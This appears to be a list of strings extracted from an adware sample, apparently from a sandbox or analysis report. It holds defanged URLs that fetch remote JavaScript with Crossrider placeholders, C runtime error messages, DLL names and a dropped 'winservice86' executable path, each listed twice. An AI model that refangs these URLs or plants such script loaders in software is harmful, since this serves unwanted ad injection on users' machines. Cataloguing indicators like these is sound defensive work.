hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
USER32.DLL
USER32.DLL
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
winservice86 exe
winservice86 exe
1000.1000.1000.1000
1000.1000.1000.1000
winservice86.exe
winservice86.exe